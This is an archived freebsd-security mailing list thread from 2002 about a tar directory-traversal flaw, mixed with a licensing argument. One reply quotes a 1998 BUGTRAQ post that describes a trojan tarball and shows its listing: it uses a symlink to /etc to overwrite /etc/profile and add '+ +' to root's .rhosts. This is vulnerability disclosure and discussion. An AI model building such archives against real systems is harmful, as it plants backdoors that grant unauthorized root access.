of people with their own patches that no one else > > could see. While the GPL isn't > > People, please take this GPL discussion to -chat. Thanks. Sorry, I actaully started to write, thought, "Why the hell would I sent this to -security?" and hit C-x instead of C-c by accident. Oops. -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 13:14:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4147737B401 for ; Tue, 1 Oct 2002 13:14:31 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D776E43E3B for ; Tue, 1 Oct 2002 13:14:30 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from earthlink.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout01.icomcast.net (iPlanet Messaging Server 5.1 HotFix 1.4 (built Aug 5 2002)) with ESMTP id <0H3B00FL7K72UG@mtaout01.icomcast.net> for security@FreeBSD.ORG; Tue, 01 Oct 2002 16:13:51 -0400 (EDT) Date: Tue, 01 Oct 2002 16:13:49 -0400 From: Larry Sica Subject: Re: Is FreeBSD's tar susceptible to this? In-reply-to: <200210011934.g91JY6OW045102@apollo.backplane.com> To: Matthew Dillon Cc: Brett Glass , Matt Piechota , Aaron Namba , security@FreeBSD.ORG Message-id: <4C74EABB-D57A-11D6-AD20-000393A335A2@earthlink.net> MIME-version: 1.0 X-Mailer: Apple Mail (2.546) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday, October 1, 2002, at 03:34 PM, Matthew Dillon wrote: > > :This is not because of the BSDL or GPL though. It is because of the > :project's makeup. Politics aside, a license has nothing to do with > the > :quality of the work, or lack thereof. And many *BSD and BSDL products > :have had security problems. Now sure, the zlib problem was avoided. > :But FreeBSD has had it's own recent spate of problems. I am not sure > :this discussion is even appropriate in this forum. If we are > :vulnerable it needs to be fixed, period. Let's not use a security > :problem for political maneuvering. > : > :--Larry > > The zlib problem was not avoided, e.g. 1.5.8.1 of deflate.c (unless > you are talking about another one, there were a couple of issues > if I recall), but zlib is an excellent example of the sucess of the > open-source community grapevine. I would have to go back and check for the exact one, but I should have been clearer, FreeBSD was affected but not as bad as some other OSes. Mostly because FreeBSD Did The Right Thing. I'll be clearer what I mean in the future.. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 13:20: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 320F137B401 for ; Tue, 1 Oct 2002 13:20:06 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7C85943E42 for ; Tue, 1 Oct 2002 13:20:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA21389; Tue, 1 Oct 2002 14:19:51 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001141233.036c0b00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 14:19:49 -0600 To: Matthew Dillon From: Brett Glass Subject: Re: RE: Is FreeBSD's tar susceptible to this? Cc: Matt Piechota , Aaron Namba , In-Reply-To: <200210011947.g91Jl1sO052241@apollo.backplane.com> References: <4.3.2.7.2.20021001113225.034331b0@localhost> <4.3.2.7.2.20021001122135.0344e410@localhost> <4.3.2.7.2.20021001133156.03609ec0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:47 PM 10/1/2002, Matthew Dillon wrote: > I seriously doubt anyone would be interested in rolling their own > gnu-compatible tar or adapting an older non-gnu tar to our needs. > People have gotten used to the gnu switches. I seriously doubt anyone would be interested in creating or using an operating system based on BSD. People have gotten used to Linux. :-S Or s/Linux/Windows/ in the above. It's clearly important, from a *security* standpoint (and, yes, this is about security, not just licensing), that there not be a monoculture. > I'm not sure I understand why you are advocating integrating bzip > into tar. Because IPC consumes resources and computing power. Going directly to zlib makes a lot more sense, IMHO. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 14: 4:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3A5C437B401 for ; Tue, 1 Oct 2002 14:04:13 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id D811B43E77 for ; Tue, 1 Oct 2002 14:04:11 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91L3CV90978; Tue, 1 Oct 2002 14:03:12 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 14:03:11 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: Matthew Dillon , Matt Piechota , Aaron Namba , Subject: Re: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: <4.3.2.7.2.20021001133156.03609ec0@localhost> Message-ID: <20021001134719.S67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > I agree. And while folks are correct that licensing is not the only issue > here, why not take the opportunity to adopt something BSD-licensed instead? > At the same time, it would be possible to integrate bzip instead of invoking > it as a separate process. This would make it more efficient when we go to > bzip for ports and packages. Brett, i'm going to thank you on behalf of the various BSD projects for volunteering your time and skills in creating a BSD licensed tar that is GNU-tar compatable. should i expect this before or after the BSD licensed C compiler? -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 14:10:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C08A437B401 for ; Tue, 1 Oct 2002 14:10:49 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D8D5243E86 for ; Tue, 1 Oct 2002 14:10:48 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA22192; Tue, 1 Oct 2002 15:10:09 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001150751.00d134d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 15:10:06 -0600 To: "f.johan.beisser" From: Brett Glass Subject: Re: RE: Is FreeBSD's tar susceptible to this? Cc: Matthew Dillon , Matt Piechota , Aaron Namba , In-Reply-To: <20021001134719.S67581-100000@pogo.caustic.org> References: <4.3.2.7.2.20021001133156.03609ec0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:03 PM 10/1/2002, f.johan.beisser wrote: >Brett, i'm going to thank you on behalf of the various BSD projects for >volunteering your time and skills in creating a BSD licensed tar that is >GNU-tar compatable. It shouldn't be hard to do. Will anyone volunteer to be the other half of the clean room reverse engineering team so that we can avoid copyright problems and whip this out as soon as possible? >should i expect this before or after the BSD licensed >C compiler? Actually, there already ARE BSD-licensed C compilers, including TenDRA. The BSDs should use one of them. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15: 1:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3CFF137B401 for ; Tue, 1 Oct 2002 15:01:10 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id EA3CE43E42 for ; Tue, 1 Oct 2002 15:01:09 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91M0Qo91607; Tue, 1 Oct 2002 15:00:26 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 15:00:25 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: Matthew Dillon , Matt Piechota , Aaron Namba , Subject: Re: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: <4.3.2.7.2.20021001150751.00d134d0@localhost> Message-ID: <20021001142208.S67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > It shouldn't be hard to do. Will anyone volunteer to be the other half > of the clean room reverse engineering team so that we can avoid copyright > problems and whip this out as soon as possible? if the code is fresh, and written from scratch, there will be no copyright problems. it just has to be able to decypher the tarball, after all. since tar's command line structure and switches predate GNU-tar, i don't think that will be an issue. i don't know many people who use the GNU style long switch convention when doing a fast tar script. in looking at /usr/src/bin/pax/tar.[c,h], i don't see any evidence of the GPL in there. as far as i know, you have to choose to install GNU-tar, as a separate program; something which i do, to ensure compatability accross all my machines and platforms. if i'm wrong in this understanding, please correct me, and point me to the evidence that says otherwise. > >should i expect this before or after the BSD licensed > >C compiler? > > Actually, there already ARE BSD-licensed C compilers, including TenDRA. > The BSDs should use one of them. yes, but can any of those compile the OS as it's already written? i wouldn't want to be the poor victim assigned to rewrite all the lines of code. counting comments, and i assume, whitespace (meaning it's not 100% accurate): [jan@hi src] {73}$ find /usr/src -name "*.[h,c]" -print | xargs wc -l \ | grep -v total | awk ' { s = s + $1 } { print s } ' | tail -1 6217166 that's at least 5 million lines of code. as several have said before me: if it's not broken, don't fix it. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15: 1:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5889037B401 for ; Tue, 1 Oct 2002 15:01:37 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id D179343E4A for ; Tue, 1 Oct 2002 15:01:36 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91M1aA91631 for ; Tue, 1 Oct 2002 15:01:36 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 15:01:36 -0700 (PDT) From: "f.johan.beisser" To: security@freebsd.org Subject: Appoligies.. Message-ID: <20021001150109.W67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i ment to move this thread to -chat, where it belongs. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15: 9:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E813737B404 for ; Tue, 1 Oct 2002 15:09:10 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1EBD43E4A for ; Tue, 1 Oct 2002 15:09:09 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA22963; Tue, 1 Oct 2002 16:08:49 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001160301.034597f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 16:08:46 -0600 To: Kris Kennaway From: Brett Glass Subject: Re: RE: Is FreeBSD's tar susceptible to this? Cc: Matthew Dillon , Matt Piechota , Aaron Namba , security@FreeBSD.ORG In-Reply-To: <20021001213251.GA54642@xor.obsecurity.org> References: <4.3.2.7.2.20021001133156.03609ec0@localhost> <4.3.2.7.2.20021001113225.034331b0@localhost> <4.3.2.7.2.20021001122135.0344e410@localhost> <4.3.2.7.2.20021001133156.03609ec0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:32 PM 10/1/2002, Kris Kennaway wrote: >Discussions of licensing and reimplementation of GNU utilities are >off-topic for security. However, I encourage you to continue this >discussion in another forum. For example, NetBSD's pax(1) code has a >half-implemented GNU tar compatibility mode which could be extended to >cover most of the common GNU tar options. Yes, it does have most of the features of GNU tar. About the only thing it's missing is bzip2 capability, which is easy to add. Complete code to translate the command line options would be dull work but not technically challenging at all. (It could even be done by a Perl front end, though it'd be better to reduce it to C.) In the meantime, though, is there a chance that a fix for the vulnerability can be slipped into 4.7 prior to release? I'd hate to be exploding a tarball, as root, and discover that it had upreferenced to the top of the directory tree and installed something nasty. (If such an exploit were to hit /etc/crontab, it could run arbitrary code in a minute or less -- probably before the admin could react.) --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15:22: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 36B8837B401 for ; Tue, 1 Oct 2002 15:22:04 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id EE35A43E65 for ; Tue, 1 Oct 2002 15:22:03 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91MLxJ91826; Tue, 1 Oct 2002 15:21:59 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 15:21:58 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: security@FreeBSD.ORG Subject: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <4.3.2.7.2.20021001160301.034597f0@localhost> Message-ID: <20021001151050.F67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > In the meantime, though, is there a chance that a fix for the vulnerability > can be slipped into 4.7 prior to release? I'd hate to be exploding a > tarball, as root, and discover that it had upreferenced to the top of > the directory tree and installed something nasty. (If such an > exploit were to hit /etc/crontab, it could run arbitrary code in a > minute or less -- probably before the admin could react.) if you're untarring something, shouldn't you review what you're looking at first anyway? even if the vulnerability exists, it doesn't make it easy to exploit - if you review what you're untarring before doing it as root. best practice is to continue to not untar things as root untill you've reviewed the contents of your file. you can't control what anyone else puts in to the file anyway. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15:31:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7813A37B401 for ; Tue, 1 Oct 2002 15:31:54 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9C66243E81 for ; Tue, 1 Oct 2002 15:31:52 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA23313; Tue, 1 Oct 2002 16:31:42 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20021001162821.036c0530@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 01 Oct 2002 16:31:39 -0600 To: "f.johan.beisser" From: Brett Glass Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) Cc: security@FreeBSD.ORG In-Reply-To: <20021001151050.F67581-100000@pogo.caustic.org> References: <4.3.2.7.2.20021001160301.034597f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 04:21 PM 10/1/2002, f.johan.beisser wrote: >if you're untarring something, shouldn't you review what you're looking at >first anyway? Most people look at what's being untarred as it happens. They don't expect upward directory traversal to be possible, so they don't anticipate being hit in the way that this bug allows. Also, even if one does list the contents of a large archive (say, a complete distribution of Apache), you'd need to list it slowly and read it critically. Even a really long file name will scroll by FAST during a listing and could be missed. Let's preserve the intended function of the program and also abide by the POLA. I'm sure that this will get fixed sometime soon, but what I'd *really* like is to see a quick patch in time for 4.7. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15:55:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 681D037B401 for ; Tue, 1 Oct 2002 15:55:11 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id DB84B43E42 for ; Tue, 1 Oct 2002 15:55:06 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g91MsFvU014326; Tue, 1 Oct 2002 15:54:19 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200210012254.g91MsFvU014326@gw.catspoiler.org> Date: Tue, 1 Oct 2002 15:54:15 -0700 (PDT) From: Don Lewis Subject: Re: RE: Is FreeBSD's tar susceptible to this? To: brett@lariat.org Cc: kris@obsecurity.org, dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG In-Reply-To: <4.3.2.7.2.20021001160301.034597f0@localhost> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Oct, Brett Glass wrote: > In the meantime, though, is there a chance that a fix for the vulnerability > can be slipped into 4.7 prior to release? I'd hate to be exploding a > tarball, as root, and discover that it had upreferenced to the top of > the directory tree and installed something nasty. (If such an > exploit were to hit /etc/crontab, it could run arbitrary code in a > minute or less -- probably before the admin could react.) What if the tarball installs a symlink to / under the current directory followed by files that are unpacked underneath the symlink name? A simple fix for the initial problem mentioned in this thread isn't sufficient. This is hardly a new problem. Here's a 1998 BUGTRAQ message: ] Message-ID: <199809220756.JAA18518@aemiaif.lip6.fr> ] Date: Tue, 22 Sep 1998 09:56:46 +0200 ] Reply-To: Willy TARREAU ] Sender: Bugtraq List ] From: Willy TARREAU ] Subject: tar "features" ] To: BUGTRAQ@netspace.org ] ] Hi all ! ] ] After reading all these threads about locate, bash ..., I wondered how tar ] could be abused. Although I didn't find a buffer overflow in a file or ] directory name (fortunately), it came to me a way to make tar overwrite ] absolute files on disk, (given the user has access to it), but I can't find ] how to protect from this because it's based on a perfectly legal behaviour. ] It's based on the symlinks. ] ] Here's an example of a tar file which will overwrite your /etc/profile to ] make it add "+ +" to root's .rhosts next time he logs in. So if part of its ] directory architecture is included in any package, a root user could un-tar ] it to any location without really noticeing that /etc/profile has been ] rewritten. ] ] Of course it would be simpler with only two files, one link to /root and a ] .rhosts, but that becomes really evident when you consult the file before ] extracting it. Note that it could also be interesting to write a key to ] $ANYUSER/.ssh/authorized_keys ! ] ] The output of the tar ztvf gives this: ] $ tar ztvf trojanhorse.tar.gz ] drwxr-xr-x willy/users 0 Sep 21 11:43 1998 Src/ ] -rw-r--r-- willy/users 46 Sep 21 11:43 1998 Src/Makefile ] -rw-r--r-- willy/users 17 Sep 21 11:42 1998 Src/dummy.c ] lrwxrwxrwx willy/users 0 Sep 21 11:45 1998 src -> Src ] drwxr-xr-x willy/users 0 Sep 21 11:41 1998 Include/ ] -rw-r--r-- willy/users 30 Sep 21 11:41 1998 Include/config.h ] lrwxrwxrwx willy/users 0 Sep 21 11:34 1998 include -> /etc ] -rw-r--r-- willy/users 758 Sep 21 11:40 1998 include/profile ] lrwxrwxrwx willy/users 0 Sep 21 11:53 1998 include -> Include ] ] The "src" and "Src" directories are just here to make detection less evident. ] This is the "include" link to /etc which does the work. After processing, ] it's re-linked to "Include" so when tar ends, no trace is kept of what has ] been done, except in /etc/profile. ] ] The file comes here, uuencoded. PLEASE SAVE YOUR /etc/profile before ] extracting it to any place (/tmp, for example). I think that if tar gave ] just a warning each time a file is written after a symlink, and each time ] a symlink points to /something, this could be good, but perhaps someone ] would have a better idea. ] ] Willy ] ] -- ] +----------------------------------------------------------------------------+ ] | Willy Tarreau - tarreau@aemiaif.lip6.fr - http://www-miaif.lip6.fr/willy/ | ] | System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ | ] | Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 | ] +----------------------------------------------------------------------------+ ] [ snip ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 15:56:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B66BB37B401 for ; Tue, 1 Oct 2002 15:56:51 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 77D7C43E6E for ; Tue, 1 Oct 2002 15:56:51 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91Mum592049; Tue, 1 Oct 2002 15:56:48 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 15:56:48 -0700 (PDT) From: "f.johan.beisser" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: tar/security best practice (was Re: RE: Is FreeBSD's tar susceptible to this?) In-Reply-To: <4.3.2.7.2.20021001162821.036c0530@localhost> Message-ID: <20021001154626.M67581-100000@pogo.caustic.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 1 Oct 2002, Brett Glass wrote: > Most people look at what's being untarred as it happens. They don't > expect upward directory traversal to be possible, so they don't > anticipate being hit in the way that this bug allows. i tend to do the same thing, from a temp directory within $HOME. i don't expect an attacker to be able to get to my crontab (your example) or modify something else (perhaps /etc/inetd.conf) if the permissions aren't there anyway. it's rare i'll do much as root. exceedingly rare. best practice is to NOT do much as root if you don't have too. > Also, even if one does list the contents of a large archive (say, > a complete distribution of Apache), you'd need to list it slowly > and read it critically. Even a really long file name will scroll > by FAST during a listing and could be missed. "tar tvf | [more || less]" doesn't seem that hard to me. this is about best practice after all. if it's a modified tarball, it won't match the MD5 signature anyway, and shouldn't be trusted by the ports system. if you're building on your own, you shouldn't be handling the untar and build as root. there's little reason to have root access untill the install. i guess i would be more worried about this having the ability to execute arbitrary code as the user; which it doesn't seem to have. -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "John Ashcroft is really just the reanimated corpse of J. Edgar Hoover." -- Tim Triche To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16: 2:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 10A8637B401 for ; Tue, 1 Oct 2002 16:02:53 -0700 (PDT) Received: from gw.catspoiler.org (217-ip-163.nccn.net [209.79.217.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id 81A6643E6A for ; Tue, 1 Oct 2002 16:02:52 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Received: from mousie.catspoiler.org (mousie.catspoiler.org [192.168.101.2]) by gw.catspoiler.org (8.12.5/8.12.5) with ESMTP id g91N27vU014349; Tue, 1 Oct 2002 16:02:11 -0700 (PDT) (envelope-from dl-freebsd@catspoiler.org) Message-Id: <200210012302.g91N27vU014349@gw.catspoiler.org> Date: Tue, 1 Oct 2002 16:02:07 -0700 (PDT) From: Don Lewis Subject: Re: RE: Is FreeBSD's tar susceptible to this? To: brett@lariat.org Cc: dillon@apollo.backplane.com, piechota@argolis.org, aaron@namba1.com, security@FreeBSD.ORG In-Reply-To: <4.3.2.7.2.20021001141233.036c0b00@localhost> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 1 Oct, Brett Glass wrote: > At 01:47 PM 10/1/2002, Matthew Dillon wrote: >> I'm not sure I understand why you are advocating integrating bzip >> into tar. > > Because IPC consumes resources and computing power. Going directly to > zlib makes a lot more sense, IMHO. Compared to the bzip CPU hog, the IPC overhead is lost in the noise. On the other hand, doing this in separate processes allows tar to overlap its I/O with the compression being done by bzip. The approach taken by dump to overlap disk I/O with tape I/O would be better, and an even better approach would be to do this in one process with threads. I'm not volunteering ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 1 16: 7:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3164137B401 for ; Tue, 1 Oct 2002 16:07:43 -0700 (PDT) Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id E24EE43E6A for ; Tue, 1 Oct 2002 16:07:42 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91N7Vd92103; Tue, 1 Oct 2002 16:07:31 -0700 (PDT) (envelope-from jan@caustic.org) Date: Tue, 1 Oct 2002 16:07:31 -0700 (PDT) From: "f.johan.beisser" To: Don Lewis Cc: brett@lariat.org, , , , , Subject: Re: RE: Is FreeBSD's tar susceptible to this? In-Reply-To: 